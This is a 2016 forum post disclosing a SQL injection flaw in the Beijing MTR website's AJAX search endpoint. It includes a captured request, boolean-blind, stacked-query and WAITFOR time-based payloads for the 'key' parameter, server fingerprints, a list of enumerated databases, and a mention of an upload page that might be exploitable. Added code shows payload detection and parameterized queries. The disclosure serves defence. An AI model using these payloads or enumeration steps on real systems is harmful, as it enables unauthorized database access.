HanDs
Administrator

[July vulnerability disclosure] SQL injection vulnerability on the Beijing MTR (京港地铁) main site



Details:

http://**.**.**.**/index.html



[screenshot: Snap154.png]







Captured request

Code block:
POST /Ajax/AjaxUser.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/other/soso.html?key=a%27or%27a%27=%27a
Content-Length: 59
Cookie: CNZZDATA1000053835=809273715-1464512103-http%253A%252F%252F**.**.**.**%252F%7C1464512103; ASP.NET_SessionId=qweokd55xnpxwc45ed3krr55
Connection: keep-alive

cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=k
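The request above is a plain form POST, so the only thing separating it from the injection attempts reported later is the content of the `key` value. The following scanner is an added example, not code from the original post or from the affected site: it URL-decodes a form body (or a query string such as the one in the Referer header) and flags values carrying the indicator patterns this report exhibits: a `WAITFOR DELAY` time delay, a stacked statement after `;`, a tautology such as `3271=3271` or `'a'='a`, a trailing `--` comment, and an odd number of single quotes. The sample bodies are constructed from the capture and the payload shapes in this report.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample bodies: the benign body from the capture, the Referer's
# query string, and two bodies carrying the payload forms reported for `key`.
SAMPLE_BODIES = [
    "cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=k",
    "key=a%27or%27a%27=%27a",
    "cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0"
    "&key=a%25%27+AND+3271%3D3271+AND+%27%25%27%3D%27",
    "cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0"
    "&key=a%25%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--",
]

# Indicator name -> regex applied to each decoded parameter value.
INDICATORS = [
    ("time_delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("stacked_query",
     re.compile(r";\s*(WAITFOR|SELECT|EXEC|INSERT|UPDATE|DELETE|DROP)\b", re.I)),
    # N=N or 'x'='x, with the closing quote optional (the Referer payload lacks it)
    ("tautology", re.compile(r"'?(\w+)'?\s*=\s*'?\1\b")),
    ("comment_terminator", re.compile(r"--\s*$|/\*")),
]


def scan_form_body(body):
    """Return {param: [indicator names]} for every parameter whose decoded
    value trips at least one indicator; an empty dict means nothing flagged."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [label for label, rx in INDICATORS if rx.search(value)]
        # An odd number of single quotes breaks out of a quoted SQL literal.
        if value.count("'") % 2 == 1:
            hits.append("unbalanced_quote")
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body)
        print("  ->", scan_form_body(body) or "clean")
```

The heuristics are deliberately narrow so the benign capture (`key=k`) stays clean; in a real deployment this belongs in request logging or a WAF rule set, and the decisive fix is still on the server side, where the value must be bound as a query parameter rather than concatenated into SQL.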



Injected parameter: key





Code block:
---
Parameter: key (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%' AND 3271=3271 AND '%'='

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%';WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
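The boolean-based payload `a%' AND 3271=3271 AND '%'='` only works if the server builds its filter as `LIKE '%` + key + `%'` by string concatenation. The following is an added example, not the site's code: it reproduces that construction against a constructed in-memory SQLite table (assumed here as a stand-in for the SQL Server backend; SQLite cannot reproduce the `WAITFOR DELAY` or stacked-query findings, only the boolean-based one) and places the parameterized form beside it. With the vulnerable query the true payload returns every row containing `a` and the false variant returns nothing, which is exactly the signal blind injection relies on; with the parameterized query the same payload is searched for literally and matches nothing.

```python
import sqlite3

# Constructed sample rows; the real table and schema are not on the page.
SAMPLE_ROWS = [
    ("Line 4 timetable change",),
    ("Daxing Line opening notice",),
    ("Lost and found policy",),
]


def _connect():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (title TEXT)")
    con.executemany("INSERT INTO news VALUES (?)", SAMPLE_ROWS)
    return con


def search_vulnerable(key):
    """LIKE filter built by concatenation: the user value becomes SQL text."""
    con = _connect()
    sql = "SELECT title FROM news WHERE title LIKE '%" + key + "%'"
    return [row[0] for row in con.execute(sql)]


def search_parameterized(key):
    """Hardened form: the value is bound as a parameter and the wildcards are
    added to the value, never to the SQL text."""
    con = _connect()
    sql = "SELECT title FROM news WHERE title LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + key + "%",))]


if __name__ == "__main__":
    true_payload = "a%' AND 3271=3271 AND '%'='"
    false_payload = "a%' AND 3271=3272 AND '%'='"
    print("normal search:", search_vulnerable("Line"))
    print("vulnerable, true condition:", search_vulnerable(true_payload))
    print("vulnerable, false condition:", search_vulnerable(false_payload))
    print("parameterized, same payload:", search_parameterized(true_payload))
```

One caveat that parameterization alone does not cover: `%` and `_` inside the bound value still act as LIKE wildcards, so if a user-supplied search term must be matched literally, escape those characters in the value as well.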





Databases



available databases [10]:
[*] BJMTR_WEB
[*] BJMTRWEB
[*] BJMTRWEBUAT01
[*] DB_InDiTie
[*] db_jgdt_en
[*] JOB
[*] master
[*] model
[*] msdb
[*] tempdb





Code block:
current database:    'BJMTR_WEB'





[screenshot: Snap155.png]

Proof of vulnerability:

There is also an upload page, not sure whether it can be exploited: http://**.**.**.**/HR/upload.aspx

Anyway, I couldn't get any further.

Fix recommendation:


Posted: 2016-7-15   |   Views: 0   |   Replies: 0